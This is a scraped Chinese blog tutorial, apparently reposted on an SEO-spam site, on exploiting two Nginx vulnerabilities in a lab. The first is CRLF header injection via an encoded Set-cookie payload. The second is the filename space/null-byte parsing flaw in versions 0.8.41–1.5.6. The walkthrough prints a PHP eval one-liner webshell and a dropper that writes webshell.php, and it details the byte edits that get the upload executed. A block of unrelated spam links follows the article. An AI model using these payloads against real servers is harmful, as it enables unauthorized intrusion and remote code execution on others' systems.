当前位置: 首页 > wzjs >正文

供应链平台系统宁波seo推广优化公司

供应链平台系统,宁波seo推广优化公司,电子商务网站建设需求,生鲜网站建设规划书一、CRLF注入漏洞 原理:Nginx将传入的url进行解码,对其中的%0a%0d替换成换行符,导致后面的数据注入至头部,造成CRLF 注入漏洞 1、开环境 2、访问网站,并抓包 3、构造请求头 %0ASet-cookie:JSPSESSID%3D1 这样就可以…

一、CRLF注入漏洞

原理:Nginx将传入的url进行解码,对其中的%0a%0d替换成换行符,导致后面的数据注入至头部,造成CRLF 注入漏洞

1、开环境

2、访问网站,并抓包

3、构造请求头

%0ASet-cookie:JSPSESSID%3D1 

这样就可以看到响应头里有我们刚刚添加的cookie了

二、文件名逻辑漏洞

原理:非法字符空格和截止符(\0)会导致Nginx解析URI时的有限状态机混乱,此漏洞可导致目录跨越及代码执行,其影响版本为:nginx 0.8.41 – 1.5.6

1、开环境

2、制造木马

在我们本地新建一个1.jpg(因为这里只能上传图片文件)里面写入一句话木马

<?php @eval($_POST[cmd]);?>

3、上传木马,抓包

4、修改数据包

在文件名的最后加个空格,就可以把木马上传进去

5、放行,访问木马

这里看到木马已经上传进去了

(1)直接访问是访问不到的,我们需要在文件名后加...php然后抓包

(2)抓到包之后修改数据包,把2e 2e 2e修改为20 00 2e

(3)放行

修改完成之后放行就可以访问到木马了

6、测试连接

这里发现我们的木马文件虽然传上去了,但是因为我们的木马文件被编码了,所以直接连是连不上的,所以我们需要重新构造木马文件

7、重新构造文件上传

这串代码的意思是:在当前目录生成一个webshell.php文件,里面是一句话木马

<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

上传2.jpg,抓包,加空格,放行

访问刚刚上传的文件,这一步是为了执行代码

/uploadfiles/2.jpg...php

还是抓包,修改为20 00 2e

执行成功之后去访问我们木马里写的webshell.php文件

8、访问成功,测试连接

http://www.dtcms.com/wzjs/293522.html

相关文章:

  • 网站后台管理系统 模板友情链接检测659292
  • 某网站注册需要邮箱是怎么弄网络怎样做推广
  • 个人做电影网站有什么风险移动端关键词排名优化
  • asp无刷新网站模板小程序开发平台有哪些
  • 兰州建网站的做网站用哪个软件
  • 工程建设云小程序seo搜索培训
  • 金融网站建设内容网络营销推广专员
  • 常州做网站哪家快百度seo排名推广
  • 浙江台州网站制作培训报名
  • 网站开发属于哪个类目济南seo小黑seo
  • 大连零基础网站建设培训哪里有什么是搜索引擎优化推广
  • 网站建设怎么管理业务员网络服务运营商
  • 什邡市建设局门户网站最近新闻热点事件
  • 政府网站数据模块建设方案nba排名最新赛程
  • 濮阳免费网站制作最新营销模式
  • 黄山网站建设策划徐州seo企业
  • 中山营销网站建设谷歌推广一年多少钱
  • 沈阳快速建站模板快速排名优化推广手机
  • 聊城网站建设设计开发公司sem营销
  • 杭州网站开发制作公司排名百度在线提问
  • c语言怎么做网站如何做网络推广外包
  • 优秀广告案例上海知名的seo推广咨询
  • 华阳路街道网站建设长沙网站制作策划
  • 国内便宜的vps怎么优化整站
  • 电子商城开发网站开发台州网站建设推广
  • 小白学做网站买什么书疫情死亡最新数据消息
  • 阿里巴巴做网站客服优化大师手机版下载
  • 云虚拟主机怎么做网站贵阳seo网站推广
  • 网站pv uv统计病毒什么时候才能消失
  • 网站的安全度百度app免费下载